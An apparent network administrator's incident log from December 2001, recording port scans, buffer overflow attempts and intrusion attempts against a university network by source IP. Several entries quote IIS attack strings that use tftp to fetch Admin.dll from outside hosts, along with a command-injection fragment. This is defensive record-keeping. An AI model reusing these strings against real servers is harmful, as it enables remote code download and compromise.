Short summary of some of the attacks against us for Dec. 2001 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes 2001/12/01-01:27:41.09 149.160.26.42 (Indiana University Southeast Computing Services) scannet for port 3879 2001/12/01-02:53:14.09 202.90.128.194 (bagyo.pagasa.dost.gov.ph) scannet for port 53, probe bind version number 2001/12/01-06:01:26.91 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scan net for ports 524,137 2001/12/01-06:10:05.57 194.102.114.60 (GENERAL COMTRUST INC,PETROSANI,RO) scan 1 high number port per machine on net, slow scan all day 2001/12/01-07:50:45 64.81.102.137 (dsl081-102-137.den1.dsl.speakeasy.net) scannet for port 22 2001/12/01-09:11:10.21 209.254.179.248 (A020-1010.CHCG.splitrock.net) scan net fo port 21 2001/12/01-09:11:39.71 24.254.34.197 (1c1799423-a.wntck1.sfba.home.com) scan net for port 21 2001/12/01-09:14:40.90 205.251.223.147 (Cable Atlantic Inc,NF,CA) scannet for port 21 2001/12/01-11:00:13.87 150.165.13.141 (rt-ab.campus-ii.ufpb.br) scannet for port 111 + buff overflow attacks (statdx) 2001/12/01-11:02:07.03 213.213.52.7 (h213-52-7.NA.albacom.net) scannet for port 515 2001/12/01-23:29:13.61 200.16.144.171 (ppp39-Slot07-Sys5000-1.via-net-works.net.ar) scan net for port 1214 2001/12/02-00:27:02 216.166.147.79:22 (ccs79.cotcomsol.com) scannet for port 22 2001/12/02-06:07:17.26 211.97.168.156 (China United Telecommunications Corporation,CN) slow scan of net for port 80 2001/12/02-06:21:38.16 194.102.114.60 (GENERAL COMTRUST INC,PETROSANI,RO) scan 1 high number port per machine on net, slow scan all day 2001/12/02-07:00:09.90 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for ports 524,137 2001/12/02-11:26:01.49 202.109.255.240 ( xm-8163-2,CN) scannet for port 8000 2001/12/02-14:14:05.93 193.41.215.59 (dialup2059.quicknet.se) scannet for port 111 2001/12/02-14:41:45.86 193.41.215.59 (dialup2059.quicknet.se) start of buff overflow attacks on multiple ips. (rstatd) 2001/12/02-22:19:48.34 65.96.105.219 (h0020351f7a12.ne.mediaone.net) scannet for port 111 2001/12/02-22:19:48.78 65.96.105.219 (h0020351f7a12.ne.mediaone.net) start of buff overflow attacks on multiple ips. 2001/12/02-22:29:09.71 64.220.214.19 (w019.z064220214.den-co.dsl.cnc.net) scannet for port 111 2001/12/03-06:23:22.71 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for ports 524,137 2001/12/03-06:23:22.71 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for ports 524,137,139 2001/12/03-07:39:19.50 193.41.215.59 (dialup2059.quicknet.se) scannet for port 111, buff overflow attacks on statd 2001/12/03-07:42:35.74 193.41.215.59 (dialup2059.quicknet.se) scannet for port 111, buf overflow attacks 2001/12/03-14:33:44.11 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for ports 524,137 2001/12/03-14:33:44.11 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for ports 524,137,139 2001/12/03-17:07:16.55 209.242.156.49 (dyn-209-242-156-49.cablemas.com) scannet for port 21 2001/12/03-17:07:43.62 142.177.96.91 (hlfx46-91.ns.sympatico.ca) scan net for port 21 2001/12/03-17:07:43.62 142.177.96.91 (hlfx46-91.ns.sympatico.ca) scannet for port 21 2001/12/03-17:07:45.99 12.233.26.104 (AT&T ITS) scannet for port 21 2001/12/03-17:08:39.76 213.29.13.161 (Alborz Computer Co.,IR) scannet for port 21 2001/12/03-17:09:18.00 12.233.26.104 (AT&T ITS,NJ,US) scannet for port 21 2001/12/03-19:28:17.87 212.27.226.3 (cache.hinet.ee) scan net for port 53 2001/12/03-19:28:24.30 212.27.226.3 (cache.hinet.ee) scannet for port 53 2001/12/03-23:37:07.91 64.124.162.148 (Abovenet Communications, Inc,CA,US) scan 1 high number port per machine on net, slow scan all day 2001/12/04-03:18:48.01 63.227.232.215 (Outerbounds InternetNM,US) scannet for port 21 2001/12/04-03:18:54.78 172.139.27.108 (AC8B1B6C.ipt.aol.com) scan net for port 21 2001/12/04-03:18:54.78 172.139.27.108 (AC8B1B6C.ipt.aol.com) scan net for port 21 2001/12/04-03:20:32.65 207.65.110.45 (knoxmax1-d-45.planetc.com) scannet for port 21 2001/12/04-03:21:30.08 63.227.232.215 (Outerbounds Internet,NM,US) scannet ofr port 21 2001/12/05-00:33:01.27 193.251.176.13 (AStrasbourg-101-2-1-13.abo.wanadoo.fr) scannet for port 111 2001/12/05-02:55:43.76 213.93.146.50 (e146050.upc-e.chello.nl) scannet for port 21 2001/12/05-15:47:41.81 204.57.82.21 (ns1.resellerbid.com) scannet for port 515+buff overflow attacks (trojan port 3879) 2001/12/05-21:09:28.42 132.235.203.94 (modem-203-094.dialnet.ohiou.edu) scannet for port 80 2001/12/06-01:27:09.36 217.125.115.86 (217-125-115-86.uc.nombres.ttd.es) scannet for port 21 2001/12/06-13:36:57.09 203.90.81.203 (HCL Infinet Limited,NOIDA,IN) scannet for port 111 + buff overflow attacks.-statd 2001/12/06-14:47:57.55 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet fo ports 137,524 2001/12/06-18:46:24.15 66.35.64.6 (cave.100m.core-3.cmh.enterzone.net) scannet for port 21 2001/12/06-21:44:06.15 63.34.221.159 (2Cust159.tnt6.mel1.da.uu.net) scannet for port 21 2001/12/06-23:11:57.44 63.60.220.252 (1Cust252.tnt9.mel1.da.uu.net) scannet for port 21 2001/12/06-23:23:33.33 217.117.56.173 (217-117-56-173.teledisnet.be) scannet for port 21 2001/12/07-02:00:38.86 202.109.129.36 (Jiangxi province,data and communication bureau leased line,CN) scannet for port 80 sadmind worm 2001/12/07-10:32:23.05 151.25.196.146 (ppp-146-196.25-151.libero.it) scannet for port 23 2001/12/07-11:04:45.88 132.235.104.134 (dhcp-104-134.cns.ohiou.edu) scannet for ports 137,524 2001/12/07-15:41:22.15 217.129.239.95 (Cabovisao, televisao por cabo, SA,PT) scannet for port 111 2001/12/07-15:55:53.20 64.124.72.239 (aladdin.headbone.com) scan 1 high number port per machine on net, slow scan all day 2001/12/07-16:01:54.48 132.235.92.20 (?.oucom.ohiou.edu) scannet for port 41524 2001/12/07-18:27:27.51 62.253.140.118 (pc1-ipsw3-0-cust118.cam.cable.ntl.com) scannet for port 21 2001/12/07-20:18:24.04 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) scannet for port 80 2001/12/07-21:26:10.87 64.242.29.132 (SAVVIS Communications Corporation,MOP,US) scannet for port 515 2001/12/07-22:07:29.90 80.11.26.43 (AStrasbourg-203-1-2-43.abo.wanadoo.fr) scannet for port 21 2001/12/08-00:24:19.01 64.23.48.70 (owns.the.mafia.org.au) scan 1 high number port per machine on net, slow scan all day 2001/12/08-04:58:23.91 217.153.3.161 ( Internet Technologies Polska,PL) scan 1 high number port per machine on net, slow scan all day 2001/12/08-05:55:22.47 212.11.50.51 (mail.rfd.fr) conn to 132.235.19.90 once per minute (ftp). Try for anon ftp server previously hack. 2001/12/08-04:58:17.44 217.153.3.161 (Internet Technologies Polska,PL) scan 1 high number port per machine on net, slow scan all day 2001/12/08-06:08:19.09 213.97.147.104 (Telefonica De Espana SAU ,eS) scannet for port 80 2001/12/08-06:08:26.66 213.97.147.104 (Telefonica De Espana SAU ,SPAIN) scannet for port 80 2001/12/08-06:22:09.44 217.153.3.161 (Internet Technologies Polska,PL) scan 1 high number port per machine on net, slow scan all day 2001/12/08-08:03:22.55 208.56.213.209 (teleton.com.mx=Alabanza, Inc.,MD,US) scan 1 high number port per machine on net, slow scan all day 2001/12/08-11:34:07.58 140.119.164.129 (entlab.cs.nccu.edu.tw) scan 1 high number port per machine on net, slow scan all day 2001/12/08-11:41:47.68 140.119.164.129 (entlab.cs.nccu.edu.tw) scan 1 high number port per machine on net, slow scan all day 2001/12/08-19:57:49.76 147.208.171.139 (security.norton.com) portssca 132.235.18.153 2001/12/08-21:21:56 216.163.120.90 (host-216-163-120-90.nrtc.net) scannet for port 22 2001/12/09-05:50:37.73 217.153.3.161 (Internet Technologies Polska,PL) scan 1 high number port per machine on net, slow scan all day 2001/12/09-05:55:22.47 212.11.50.51 (mail.rfd.fr) conn to 132.235.19.90 once per minute (ftp). Try for anon ftp server previously hack. 2001/12/09-06:22:09.44 217.153.3.161 (Internet Technologies Polska,PL) scan 1 high number port per machine on net, slow scan all day 2001/12/09-12:27:07.33 80.13.50.28 (AStrasbourg-203-1-2-28.abo.wanadoo.fr) scannet for port 21 2001/12/09-12:27:11.74 80.13.50.28 (AStrasbourg-203-1-2-28.abo.wanadoo.fr) scan net for port 21 2001/12/09-13:08:13 64.252.209.11 (11.209.252.64.snet.net) scannet for port 22 2001/12/09-13:19:24.44 200.242.252.73 (irc.libnet.com.br) scan 1 high number port per machine on net, slow scan all day 2001/12/09-14:05:08 64.239.53.13 (ns.tablewares.com) scannet for port 25 2001/12/09-18:38:27 216.78.212.40 (adsl-78-212-40.bhm.bellsouth.net) scannet for port 137 2001/12/10-01:10:50 66.38.4.56 (moda056.bbtel.com) scannet for port 22 2001/12/10-01:12:19 24.42.9.3 (cr509255-a.slnt1.on.wave.home.com) scannet for port 22 2001/12/10-02:26:40 141.68.100.1:22 (kommserv1.ba-ravensburg.de) scannet for port 22 2001/12/10-06:09:21.74 216.250.230.43 (ns2.serveur-dns.org) scan 1 high number port per machine on net, slow scan all day 2001/12/10-07:38:56.72 195.96.158.98 (Archway S.r.l,MILANO,IT) scannet for port 515 2001/12/10-08:07:44.44 216.226.156.3 (Janey Huntington,Diamond Bar, CA,US) can 1 high number port per machine on net, slow scan all day 2001/12/10-17:01:07.42 80.133.89.106 (p5085596A.dip.t-dialin.net) scannet for port 21 2001/12/10-20:36:17.33 128.121.222.209 (zysol2.tempdomainname.com) scan 1 high number port per machine on net, slow scan all day 2001/12/11-01:35:24.01 66.130.110.52 (odemcable052.110-130-66.mtl.mc.videotron.ca) partial scanof net for port 21 2001/12/11-07:53:32.19 66.130.110.52 odemcable052.110-130-66.mtl.mc.videotron.ca) partial scanof net for port 21 2001/12/11-09:01:56.03 61.160.30.216:1242 (CHINANET Jiangsu province network,CN) attack IIS-buff overflow-tftp admin.dll from 132.237.7.175 2001/12/11-19:22:36.45 132.235.15.159 (water.ece.ohiou.edu) portscan 216.4.62.115 -Business Internet, Inc., FL 2001/12/11-22:34:24.79 131.247.222.88 (delta88.resnet.usf.edu) scannet for port 27374 2001/12/12-05:57:01.79 80.11.32.77 (ALille-101-1-4-77.abo.wanadoo.fr) scannet for port 21 2001/12/12-09:15:34.86 80.11.193.80 (APerpignan-101-1-3-80.abo.wanadoo.fr) scannet for port 21,anon ftp attak 2001/12/12-10:29:58.34 200.33.99.1 (ns.cvca.ulsa.mx) scannet for port 515 2001/12/12-13:12:23.92 80.11.32.77 (ALille-101-1-4-77.abo.wanadoo.fr) scannet for port 21,anon ftp attack 2001/12/12-14:23:49.31 65.164.205.143 (user143.net169.nj.sprint-hsd.net) con 132.235.15.20:514 2001/12/12-14:26:40.01 65.164.205.143 (user143.net169.nj.sprint-hsd.net) multiple conns to 132.235.15.20:177 2001/12/12-14:28:04.15 65.164.205.143 (user143.net169.nj.sprint-hsd.net) multiple conns to 132.235.15.[1,20]:177 2001/12/12-15:44:32 132.235.90.7:1029 (Ohio U. Somewere..)scannet for port 38293 2001/12/12-16:08:12.19 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet fo rpor t524 2001/12/12-20:54:26.66 210.178.150.170 (Korea crap) scannet for port 111 2001/12/12-23:01:24.23 210.178.150.170 (Korea crap) start of buff overflo9w attacks - rstatd 2001/12/12-23:28:05.16 210.124.41.22 (Korea crap) scannet for port 111 2001/12/13-06:42:08.65 61.182.50.241 (CHINANET Hebei province network,CN) scannet for port 111,+buff overflow attack-statdx 2001/12/13-10:11:35 142.104.35.113 (pt113rtc109.res.uvic.ca) scannet for port 22 2001/12/13-20:55:13.77 216.230.230.148 (as53-p03-wny-133.modempools.net) scannet for port 515-EXPLOIT LPRng overflow 2001/12/13-23:42:23 128.174.192.53 (gal6.ge.uiuc.edu) scannet for port 22 2001/12/14-07:53:58.60 217.0.80.59 (pD900503B.dip.t-dialin.net) scannet for port 80 2001/12/14-07:54:35.01 217.0.80.59 (pD900503B.dip.t-dialin.net) more netscans on port 80.33.207 2001/12/14-18:23:49.90 64.65.15.162 (ns.kantoornet.net) scan 1 high number port per machine on net, slow scan all day 2001/12/14-21:42:44.98 217.0.79.254 (pD9004FFE.dip.t-dialin.net) new attack on IIS - ...does /c+dir/a-r-h-a-s for /a thru /z 2001/12/14-23:10:58.85 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) scannet for ports 1080,8080 2001/12/15-08:21:10.53 148.204.211.20 (Instituto Politecnico Nacional,MX) scannet for port 111+buff overflow attacks 2001/12/15-10:30:13.03 61.160.30.233 (CHINANET Jiangsu province network,CN) attack iis server with cmd c+tftp%20-i%20132.237.7.175%20GET%20Admin.dll 2001/12/15-17:41:26.61 217.136.204.86 (adsl-85078.turboline.skynet.be) scannet for port 21 2001/12/16-10:28:27.91 12.233.32.88 (12-233-32-88.client.attbi.com) start of scan on port 80 on random ips (slow scan,many conns) 2001/12/16-13:57:38 213.229.65.6 (meppel2-6.kabel.dekooi.nl) scannet for port 22 2001/12/16-13:57:47.30 12.233.32.88 (12-233-32-88.client.attbi.com) scan net for port 22 2001/12/17-10:04:38.64 216.153.249.228 (host-216-153-249-228.choiceone.net) conn port 23 on 1 machine, then scannet for port 515 2001/12/18-08:19:01.43 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) scan net for port 21, anon ftp. 2001/12/18-15:29:33.26 193.153.104.25 (193-153-104-25.uc.nombres.ttd.es) 1. ftp to ace as thomas/password, wei/password,ftp 2001/12/18-15:29:33.26 193.153.104.25 (193-153-104-25.uc.nombres.ttd.es) 2. get dummy passwd file from ace via ftp. 2001/12/18-16:17:38.74 193.153.104.25 (193-153-104-25.uc.nombres.ttd.es) peruse file system on ace as anon/ftp 2001/12/18-16:35:35.86 193.153.104.25 (193-153-104-25.uc.nombres.ttd.es) portscan 132.235.1.1 2001/12/18-16:38:18.31 193.153.104.25 (193-153-104-25.uc.nombres.ttd.es) try to logon to boss w/ dummy passwds from ace. Sheesh. 2001/12/19-00:47:23.47 205.252.46.98:6667 (babble-on.systems.cais.net) scannet for port 1024 or 3072 2001/12/19-04:27:48.89 61.147.53.73 (CHINANET Jiangsu province network, CN) probe 132.235.1.35:80 2001/12/19-05:58:30.47 155.198.17.120 (wwwcache2.ic.ac.uk) pound on port 80 on 132.235.1.48 (no server running.) 2001/12/19-06:02:45.84 61.132.13.217 (CHINANET Jiangsu province network, CN) probe 132.235.1.35:21 2001/12/19-06:03:04.12 132.235.40.88 (dhcp-040-088.phy.ohiou.edu) probe port 21 on 132.235.1.35 2001/12/19-07:36:46.45 65.69.145.26 (adsl-65-69-145-26.dsl.rcsntx.swbell.net) probe port 111 on several machine + buff overflow attack 2001/12/19-08:34:17.25 61.132.13.186 (CHINANET Jiangsu province network, CN) probe 132.235.1.35:80 2001/12/19-10:08:36 140.116.246.88 (mp01.csie.ncku.edu.tw) scannet for port 111 2001/12/19-10:08:36.80 140.116.246.88 (mp01.csie.ncku.edu.tw) scannet for port 111 2001/12/19-10:32:26 217.81.161.2 (pD951A102.dip.t-dialin.net) scannet for port 21 2001/12/19-10:32:26.35 217.81.161.27 (pD951A11B.dip.t-dialin.net) scannet for port 21 2001/12/19-11:54:44.70 140.116.246.88 (mp01.csie.ncku.edu.tw) start of buff overflow attacks - rstatd 2001/12/19-14:48:08.99 208.183.225.3 (e0.filt1.shelby.tn.ena.net) >100 connects on 132.235.1.106:80 (no server running...) 2001/12/19-16:00:00 24.93.183.6:22 (a1-3d006.neo.lrun.com) scannet for port 22 2001/12/19-21:32:04 32.102.213.247 (slip-32-102-213-247.fl.us.prserv.net) scan net for port 25 2001/12/19-23:06:33 24.67.30.87:22 (h24-67-30-87.cg.shawcable.net) scannet for port 22 2001/12/19-23:59:27.77 217.153.3.161 (Internet Technologies Polska, PL) scan 1 high number port per machine on net, slow scan all day 2001/12/20-00:52:22.40 66.27.135.157 (sc-66-27-135-157.socal.rr.com) probe portws 445,139,137,23,21 on 132.235.1.[1,2] 2001/12/20-01:05:06 209.9.142.70 (209-9-142-70.sdsl.cais.net) scannet for port 22 2001/12/20-06:04:40.65 61.147.60.195 ((CHINANET Jiangsu province network) conn to 132.235.1.35 port 80 2001/12/20-06:10:36.42 217.153.3.161 (QInternet Technologies Polska) scan 1 high number port per machine on net, slow scan all day 2001/12/20-06:19:22.44 172.183.20.6 (ACB71406.ipt.aol.com) scan 1 high number port per machine on net, slow scan all day 2001/12/20-20:22:35.51 64.23.82.102 (Auction4Biz.net) scannet for port 1433,445,139 2001/12/20-21:10:53.24 64.27.86.111 (dns.ultrahosting.com) scan 1 high number port per machine on net, slow scan all day 2001/12/21-13:33:24.61 209.21.128.246:22 () scannet for port 22 2001/12/21-13:37:07.06 155.239.70.68 () scannet for port 21 2001/12/22-17:00:37.30 172.188.140.230 () scannet for port 21 2001/12/22-17:06:33.12 64.158.213.138 () scannet for port 80 2001/12/23-01:11:22.05 210.77.145.30 () scannet for port 60001 2001/12/23-01:14:20.95 80.11.32.2 () scannet for port 21 2001/12/23-01:38:44.58 61.132.13.186 () probe port 80 on 132.235.1.35 again 2001/12/23-01:56:10.68 212.226.35.5 () scannet for port 80 2001/12/23-03:15:34.57 194.66.92.238 () scannet for port 21 2001/12/24-00:34:23 210.81.122.25 () scannet for port 111 2001/12/24-07:22:39.23 195.8.255.47:22 () scannet for port 22 2001/12/24-20:20:33 128.220.24.81:22 () scannet for port 22 2001/12/25-06:45:40.95 12.233.26.35 () scannet for port 80 2001/12/25-23:39:29.14 211.158.6.20 () scannet for port 111 2001/12/25-23:40:00.14 24.42.93.109 () scannet for port 21 2001/12/26-00:57:46.29 151.100.41.2 () scannet for port 111 2001/12/26-15:40:43.02 195.205.21.167 () scannet for port 53 2001/12/26-19:27:21.88 80.130.216.103 () scannet for port 21 2001/12/26-22:16:44.05 61.177.255.229 () scannet for port 21 2001/12/27-00:46:43.27 137.48.16.58 () scannet for port 21 2001/12/27-06:21:06 195.249.123.123:22 () scannet for port 22 2001/12/27-07:57:46 216.33.232.228 () scannet for port 1433 2001/12/27-12:48:13 62.14.144.249 () scannet for port 4960[6,7,8,9] 80 all UDP 2001/12/27-22:55:30 216.78.213.55:1025 () scannet for port 137 UDP 2001/12/28-09:41:11.77 212.205.235.10 () try to login to various ips with decrypted dummy passwords from ace 2001/12/28-09:46:56.75 212.205.235.10 () try to relay mail try 132.235.1.1 2001/12/28-17:28:13.71 169.139.115.220 () scannet for port 21 2001/12/28-21:34:33 12.236.143.111 () scannet for port 515,23,53 2001/12/29-06:19:13.39 211.62.84.2 () scannet for port 53 2001/12/29-12:53:31.68 80.130.175.155 () scannet for port 119 2001/12/29-15:50:45.30 80.13.219.155 () scannet for port 21 2001/12/29-16:22:42.55 193.252.177.190 () scannet for port 21 2001/12/29-16:44:27.27 130.182.162.192 () scannet for port 110 2001/12/29-21:18:11.40 193.252.8.79 () scannet for port 21 2001/12/29-22:23:34.82 63.94.220.143 () scannet for port 111 2001/12/29-22:23:46.38 63.94.220.143 () start of buff overflow attacks 2001/12/30-03:23:49.97 61.177.61.242 (CHINANET Jiangsu province network,CN) 1. attack windows IIS server via buffer overflow 2001/12/30-03:23:49.97 61.177.61.242 (CHINANET Jiangsu province network,CN) 2. attacks last all day long, with particular attack of 2001/12/30-03:23:49.97 61.177.61.242 (CHINANET Jiangsu province network,CN) 3. tftp%20-i%20132.232.9.18%20GET%20Admin.dll%20c:\Admin.dll 2001/12/30-04:29:31.47 193.252.177.190 () scannet for port 21 2001/12/30-05:29:35.17 80.13.219.155 () scannet for port 21 2001/12/30-05:47:20.77 12.86.120.24 () portscan 132.235.2.184 ports 1-1023 2001/12/30-06:17:01.78 24.251.138.48 () portscan 132.235.2.184 2001/12/30-13:11:16.90 217.120.172.218 () scannet for port 111 2001/12/30-22:54:02.49 200.250.8.1 () scan 1 high number port per machine on net, slow scan all day 2001/12/31-01:04:47.89 61.147.59.74 () ftp probe on 132.235.1.35 2001/12/31-02:06:47.36 61.147.44.198 () using 132.235.1.70:53 to lookup porn sites 2001/12/31-14:52:44.07 211.225.219.52 () scan port 111 on 132.235.1.1